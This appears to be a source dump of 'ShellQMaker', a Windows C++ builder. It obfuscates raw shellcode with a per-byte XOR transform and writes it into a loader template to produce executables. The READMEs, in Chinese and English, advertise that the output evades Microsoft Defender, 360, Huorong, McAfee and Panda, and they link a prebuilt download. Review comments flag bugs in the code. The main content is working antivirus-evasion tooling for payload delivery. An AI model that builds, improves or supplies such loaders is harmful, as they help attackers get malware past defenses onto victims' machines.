	wxPrintf("/_______ /|___| /\\___ >____/____/\\_____\\ \\_/\\____|__ (____ /__|_ \\___ >__ | \r\n");
	wxPrintf(" \\/ \\/ \\/ \\__> \\/ \\/ \\/ \\/ \r\n");
	wxPrintf("\n");
	wxPrintf(" ShellQMaker v1.0 | 2023\n\n");

	if (argc == 3)
	{

		// NOTE(review): OpenfileA returns {size = 0, pbufr = NULL} on failure
		// (see ShellQMaker.h) and nothing here checks .pbufr, so a missing or
		// empty payload file is silently accepted and later dereferenced.
		FILEINFO shellcode = OpenfileA(argv[1]);
		// Per-byte transform: XOR with (index + 1), then add 1; the store into a
		// BYTE truncates to 8 bits. The loader must apply the exact inverse.
		// NOTE(review): `i` (int) is compared against DWORD `size` — signed/unsigned mix.
		for (int i = 0; i < shellcode.size; i++)
		{
			shellcode.pbufr[i] = (shellcode.pbufr[i] ^ (i + 1)) + 1;
		}

		// The loader template is looked up relative to the current working
		// directory, not the builder's own location.
		char loadername[] = "Loading.exe";
		FILEINFO Shellload = OpenfileA(loadername);
		// NOTE(review): same missing NULL check as above — if Loading.exe is not in
		// the working directory, Shellload.pbufr is NULL and the scan below faults.
		// Locate the shellcode placeholder inside Loading.exe
		// (original comment was GBK-encoded Chinese: "get the address of the shellcode in Loading").
		//char Shellload[]={ 0x42, ... /* ~150 repetitions of 0x42 in the original commented-out sketch */ };
		int cnt = 0, offset = 0, num = 0;
		// Scan for a run of more than 0x42 (66) consecutive 0x41 bytes; `offset`
		// is left at the first byte of that run.
		// NOTE(review): the scan has no upper bound — `cnt` is never compared with
		// Shellload.size. If the template contains no qualifying run, this reads
		// past the heap buffer until it crashes or hits a stray match. Bound the
		// loop by Shellload.size and fail cleanly when the marker is absent.
		while (TRUE)
		{
			if (Shellload.pbufr[cnt] == 0x41)
			{
				offset = cnt;
				while (Shellload.pbufr[cnt] == 0x41)
				{
					cnt++;
					num++;
					if (num > 0x42)
					{
						break;
					}
				}
			}
			if (num > 0x42)
			{
				break;
			}
			cnt++;
			num = 0, offset = 0;
		}

		// Layout written into the placeholder: [DWORD size][size bytes of payload].
		// NOTE(review): there is no check that
		//   offset + sizeof(DWORD) + shellcode.size <= Shellload.size
		// nor that the placeholder run is actually large enough; a payload larger
		// than the reserved region overruns the heap buffer and corrupts the
		// bytes that follow (or the heap itself). Check the size before copying.
		MMcpy(&(Shellload.pbufr[offset]), &(shellcode.size), sizeof(DWORD));
		MMcpy(&(Shellload.pbufr[offset + sizeof(DWORD)]), shellcode.pbufr, shellcode.size);
		// Writetofile takes ownership of Shellload.pbufr and frees it (see header).
		// shellcode.pbufr is never freed; the process exits right after, so it only leaks.
		// NOTE(review): the BOOL result is ignored, so a failed write still prints success.
		Writetofile(Shellload.pbufr, Shellload.size, argv[2]);
		wxPrintf("\r\n[+] Out ShellFile----->%s\r\n", argv[2]);

	}
	else
	{

		wxPrintf("[+] usage:\r\n");
		wxPrintf("[+] ShellQMaker.exe \"payload.bin\" \"outfile.exe\" \r\n");
		wxPrintf("[+] example:\r\n");
		wxPrintf("[+] ShellQMaker.exe payload.bin shellcode.exe \r\n");
	}
	return 0;
}
--------------------------------------------------------------------------------
/ShellQMaker/ShellQMaker/ShellQMaker.h:
--------------------------------------------------------------------------------
#pragma once
#include   // NOTE(review): angle-bracket header name lost in extraction
#include "wx/wxprec.h"
#include   // NOTE(review): angle-bracket header name lost in extraction
#include   // NOTE(review): angle-bracket header name lost in extraction

// NOTE(review): this header defines non-inline functions (OpenfileA, MMcpy,
// Writetofile); including it from more than one translation unit would produce
// duplicate-symbol link errors. Mark them `static`/`inline` or move them to a .cpp.

// A file image read into memory: `size` bytes at `pbufr`, allocated with
// HeapAlloc on the process heap. A failed OpenfileA yields size == 0, pbufr == NULL.
typedef struct { DWORD size; PBYTE pbufr; }FILEINFO;

// Reads the entire file at ptrFile into a freshly allocated process-heap buffer.
// Returns the buffer and its size; on any failure (cannot open, zero size,
// allocation failure) returns the zero-initialised struct. The caller owns pbufr.
FILEINFO OpenfileA(char* ptrFile)
{
	DWORD dwReadTotal = 0;
	DWORD dwReaded = 0;
	FILEINFO fileinfo = { 0 };
	HANDLE hFile = NULL;
	// NOTE(review): the second argument is dwDesiredAccess, but a share-mode flag
	// (FILE_SHARE_READ) is passed. It only works because FILE_SHARE_READ and
	// FILE_READ_DATA share the numeric value 1. It should be GENERIC_READ here,
	// with FILE_SHARE_READ as the third (dwShareMode) argument.
	hFile = CreateFileA(ptrFile, FILE_SHARE_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hFile == INVALID_HANDLE_VALUE)
		goto FAISE;
	// NOTE(review): GetFileSize signals failure with INVALID_FILE_SIZE (0xFFFFFFFF),
	// which the == 0 test below does not catch; that value would then drive a
	// ~4 GiB HeapAlloc. Also, files >= 4 GiB need the high DWORD.
	fileinfo.size = GetFileSize(hFile, NULL);
	if (fileinfo.size == 0)
		goto FAISE;
	fileinfo.pbufr = (byte*)HeapAlloc(GetProcessHeap(), 0, fileinfo.size);
	if (fileinfo.pbufr == 0)
		goto FAISE;
	SecureZeroMemory(fileinfo.pbufr, fileinfo.size);

	// Read until `size` bytes are in, or ReadFile fails.
	// NOTE(review): a ReadFile that succeeds with dwReaded == 0 (EOF before
	// `size`, e.g. the file shrank after GetFileSize) never terminates this loop;
	// a failed read returns a partially filled buffer while still reporting the
	// full `size`, so callers cannot detect the short read.
	while (dwReadTotal < fileinfo.size
		&& ReadFile(hFile, fileinfo.pbufr + dwReadTotal, fileinfo.size - dwReadTotal, &dwReaded, NULL))
	{
		dwReadTotal += dwReaded;
	}
FAISE:
	if (hFile != INVALID_HANDLE_VALUE)
	{
		CloseHandle(hFile);
	}
	return fileinfo;
};

// memmove-style byte copy that tolerates overlapping ranges: copies forward when
// dst lies at or below src (or entirely past the end of src), backward otherwise.
// Returns dst, or NULL if either pointer is NULL (len is not validated).
void* MMcpy(void* dst, const void* src, size_t len)
{
	char* ch_dst = (char*)dst;
	char* ch_src = (char*)src;
	if (NULL == ch_dst || NULL == ch_src) {
		return NULL;
	}

	void* rest = ch_dst;

	// Forward copy is safe when dst does not start inside [src, src + len).
	if (ch_dst <= ch_src || (char*)ch_dst >= (char*)ch_src + len) {
		while (len--) {
			*(char*)ch_dst = *(char*)ch_src;
			ch_dst = (char*)ch_dst + 1;
			ch_src = (char*)ch_src + 1;
		}
	}
	else {
		// dst overlaps the tail of src: copy from the end so bytes are not clobbered first.
		ch_src = (char*)ch_src + len - 1;
		ch_dst = (char*)ch_dst + len - 1;
		while (len--) {
			*(char*)ch_dst = *(char*)ch_src;
			ch_dst = (char*)ch_dst - 1;
			ch_src = (char*)ch_src - 1;
		}
	}
	return rest;
}


// Writes contentLen bytes from `file` to `path` (created or truncated), then
// frees `file` with HeapFree on every path — this function takes ownership of
// the buffer, so the caller must not use or free it afterwards.
// Returns FALSE only if the output file cannot be created; otherwise TRUE,
// even if the write itself failed (see NOTE below).
BOOL Writetofile(PBYTE file, DWORD contentLen, PCHAR path)
{

	HANDLE pFile;
	PBYTE tmpBuf = nullptr;
	DWORD dwBytesWrite, dwBytesToWrite;
	pFile = CreateFileA(path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	if (pFile == INVALID_HANDLE_VALUE)
	{
		// NOTE(review): CloseHandle is called on a handle that was never opened
		// (INVALID_HANDLE_VALUE); drop this call and only free the buffer.
		CloseHandle(pFile);
		HeapFree(GetProcessHeap(), 0, file);
		return FALSE;
	}
	dwBytesToWrite = contentLen;
	dwBytesWrite = 0;
	tmpBuf = file;
	// Loop until every byte has been written.
	// NOTE(review): WriteFile's BOOL result is ignored. If it fails and leaves
	// dwBytesWrite == 0 (disk full, I/O error, path is a directory), this loop
	// spins forever; if it fails after a partial write, the function still
	// returns TRUE. Check the return value and bail out on failure.
	do {
		WriteFile(pFile, tmpBuf, dwBytesToWrite, &dwBytesWrite, NULL);
		dwBytesToWrite -= dwBytesWrite;
		tmpBuf += dwBytesWrite;

	} while (dwBytesToWrite > 0);

	CloseHandle(pFile);
	HeapFree(GetProcessHeap(), 0, file);
	return TRUE;
}
--------------------------------------------------------------------------------
/ShellQMaker/ShellQMaker/main.cpp:
--------------------------------------------------------------------------------
// Name: minimal.cpp
// Purpose: Minimal wxWidgets sample
// Author: Julian Smart
// Modified by:
// Created: 04/01/98
// Copyright: (c) Julian Smart
// Licence: wxWindows licence

// ============================================================================
// declarations
// ============================================================================

// ----------------------------------------------------------------------------
// headers
// ----------------------------------------------------------------------------
// ----------------------------------------------------------------------------

// For compilers that support precompilation, includes "wx/wx.h".
#include "wx/wxprec.h"
#include "main.h"

#ifdef __BORLANDC__
#pragma hdrstop
#endif

// for all others, include the necessary headers (this file is usually all you
// need because it includes almost all "standard" wxWidgets headers)
#ifndef WX_PRECOMP
#include "wx/wx.h"
#endif

// ----------------------------------------------------------------------------
// resources
// ----------------------------------------------------------------------------

// the application icon (under Windows it is in resources and even
// though we could still include the XPM here it would be unused)
// NOTE(review): only reached when wxHAS_IMAGES_IN_RESOURCES is undefined
// (non-Windows builds); confirm ../sample.xpm actually exists in this tree.
#ifndef wxHAS_IMAGES_IN_RESOURCES
#include "../sample.xpm"
#endif

// ----------------------------------------------------------------------------
// private classes
// ----------------------------------------------------------------------------

// Define a new application type, each program should derive a class from wxApp
// In this project MyApp is only a shim: OnInit (defined further down) calls the
// console-style main() from ShellQMaker.cpp and never creates a frame.
class MyApp : public wxApp {
public:
    // override base class virtuals
    // ----------------------------

    // this one is called on application startup and is a good place for the app
    // initialization (doing it here and not in the ctor allows to have an error
    // return: if OnInit() returns false, the application terminates)
    virtual bool OnInit() wxOVERRIDE;
};

// Define a new frame type: this is going to be our main frame
// NOTE(review): leftover from the wx "minimal" sample — no MyFrame type is
// defined in this file.

// ----------------------------------------------------------------------------
// constants
// ----------------------------------------------------------------------------

// IDs for the controls and the menu commands
// NOTE(review): unused in this project — the event table that referenced them
// is commented out below.
enum {
    // menu items
    Minimal_Quit = wxID_EXIT,

    // it is important for the id corresponding to the "About" command to have
    // this standard value as otherwise it won't be handled properly under Mac
    // (where it is special and put into the "Apple" menu)
    Minimal_About = wxID_ABOUT
};

// ----------------------------------------------------------------------------
// event tables and other macros for wxWidgets
// ----------------------------------------------------------------------------

// the event tables connect the wxWidgets events with the functions (event
// handlers) which process them. It can be also done at run-time, but for the
// simple menu events like this the static method is much simpler.
//wxBEGIN_EVENT_TABLE(MyFrame, wxFrame)
//EVT_MENU(Minimal_Quit, MyFrame::OnQuit)
//EVT_MENU(Minimal_About, MyFrame::OnAbout)
//wxEND_EVENT_TABLE()

// Create a new application object: this macro will allow wxWidgets to create
// the application object during program execution (it's better than using a
// static object for many reasons) and also implements the accessor function
// wxGetApp() which will return the reference of the right type (i.e.
MyApp and 90 | // not wxApp) 91 | wxIMPLEMENT_APP(MyApp); 92 | 93 | // ============================================================================ 94 | // implementation 95 | // ============================================================================ 96 | 97 | // ---------------------------------------------------------------------------- 98 | // the application class 99 | // ---------------------------------------------------------------------------- 100 | 101 | // 'Main program' equivalent: the program execution "starts" here 102 | bool MyApp::OnInit() { 103 | // call the base class initialization method, currently it only parses a 104 | // few common command-line options but it could be do more in the future 105 | if (!wxApp::OnInit()) 106 | return false; 107 | main(); 108 | // create the main application window 109 | //MyFrame* frame = new MyFrame("Minimal wxWidgets App"); 110 | 111 | // and show it (the frames, unlike simple controls, are not shown when 112 | // created initially) 113 | //frame->Show(true); 114 | 115 | // success: wxApp::OnRun() will be called which will enter the main message 116 | // loop and the application will run. If we returned false here, the 117 | // application would exit immediately. 
118 | return true; 119 | } 120 | 121 | // ---------------------------------------------------------------------------- 122 | // main frame 123 | // ---------------------------------------------------------------------------- 124 | 125 | 126 | 127 | 128 | 129 | 130 | -------------------------------------------------------------------------------- /ShellQMaker/ShellQMaker/main.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | int main(); -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # ShellcodeLoader 2 | Windows通用免杀shellcode加载器 3 | 4 | language: [English](readme_en.md) 5 | 6 | Windows平台的ShellcodeLoader能够免杀Microsoft Defender、360、火绒、迈克菲、Panda. 7 | 8 | ## 功能特点 9 | 10 | 环境:加载器模板通过QT实现使用C++开发,并由VS2022静态编译。 11 | 12 | 目前只有一种加载模式,其他加载模式正在开发中。 13 | 14 | 截至发布时间,该项目免杀国内外主流杀毒软件; 15 | 16 | 方法:使用vs2022打开项目解决方案(.sln),然后进行编译即可。当然,你也可以从[realse](https://github.com/SecurityAnalysts01/ShellcodeLoader/releases/download/v1.1/ShellQMaker1.2.zip)下载项目。 17 | 18 | ## Project Files 19 | 20 | 本工具由ShellQMaker.exe和加载模板文件(loading.exe)组成。ShellQMaker.exe将不同的shellcode写入加载的模板文件(loading.exe)中,生成不同的可执行文件。 21 | 22 | image-20221124160121278 23 | 24 | ## 使用方法 25 | 26 | **执行ShellQMaker查看帮助** 27 | 28 | ![image-20221130105542851](Readme/shellQMaker-Instructions-001.png) 29 | 30 | **获取payload.bin文件** 31 | 32 | ![image-20221130105542851](Readme/shellQMaker-Instructions-002.png) 33 | 34 | **ShellQMaker (你的shellcode) (生成的可执行文件)** 35 | 36 | ![image-20221130105542851](Readme/shellQMaker-Instructions-003.png) 37 | 38 | **最终生成的可执行免杀程序** 39 | 40 | ![image-20221130105542851](Readme/shellQMaker-Instructions-004.png) 41 | 42 | ## Result 43 | 360 44 | 45 | ![image-20221130105542851](Readme/Result-01.png) 46 | 47 | 火绒 48 | 49 | ![image-20221130105542851](Readme/Result-02.png) 50 | 51 | Microsoft Defender 52 | 53 | 
![image-20221130105542851](Readme/Result-03.png) 54 | 55 | 迈克菲 56 | 57 | ![image-20221130105542851](Readme/Result-04.png) 58 | -------------------------------------------------------------------------------- /readme_en.md: -------------------------------------------------------------------------------- 1 | # ShellcodeLoader 2 | A Windows shellcode loader generator whose output is intended to evade AV detection. 3 | 4 | 语言: [中文](readme.md) 5 | 6 | At the time of release, the generated loader was not detected by Microsoft Defender、360、HuoRong、McAfee or Panda (see the Result section below). 7 | 8 | 9 | ## Features 10 | 11 | Environment: the loader template is written in C++ with Qt and statically compiled with VS2022. 12 | 13 | Currently there is only one loading mode; other loading modes are in development. 14 | 15 | As of the release date, the project evaded the mainstream antivirus products tested, both Chinese and international. Detection is a moving target — signatures and heuristics change — so re-test before relying on these results, and use this tooling only in engagements you are authorized to perform. 16 | 17 | Method: open the project solution (.sln) with VS2022 and compile. Alternatively, download a prebuilt package from the [release](https://github.com/SecurityAnalysts01/ShellcodeLoader/releases/download/v1.1/ShellQMaker1.2.zip). 18 | 19 | ## Project Files 20 | 21 | The tool consists of ShellQMaker.exe and the loader template (loading.exe). ShellQMaker.exe writes a given shellcode into the template to produce a distinct executable for each payload. 
22 | 23 | ![image-20221124160121278](Readme/ShellQMaker-Files-001.png) 24 | 25 | ## Instructions 26 | 27 | **Run ShellQMaker with no arguments to view the help** 28 | 29 | ![image-20221130105542851](Readme/shellQMaker-Instructions-001.png) 30 | 31 | **Obtain the payload.bin file (raw shellcode)** 32 | 33 | ![image-20221130105542851](Readme/shellQMaker-Instructions-002.png) 34 | 35 | **ShellQMaker.exe (your shellcode .bin) (output executable)** — Loading.exe must be in the current working directory 36 | 37 | ![image-20221130105542851](Readme/shellQMaker-Instructions-003.png) 38 | 39 | **The final executable is generated.** 40 | 41 | ![image-20221130105542851](Readme/shellQMaker-Instructions-004.png) 42 | 43 | ## Result 44 | 45 | 360 46 | 47 | ![image-20221130105542851](Readme/Result-01.png) 48 | 49 | HUORONG 50 | 51 | ![image-20221130105542851](Readme/Result-02.png) 52 | 53 | Microsoft Defender 54 | 55 | ![image-20221130105542851](Readme/Result-03.png) 56 | 57 | McAfee 58 | 59 | ![image-20221130105542851](Readme/Result-04.png) 60 | 61 | --------------------------------------------------------------------------------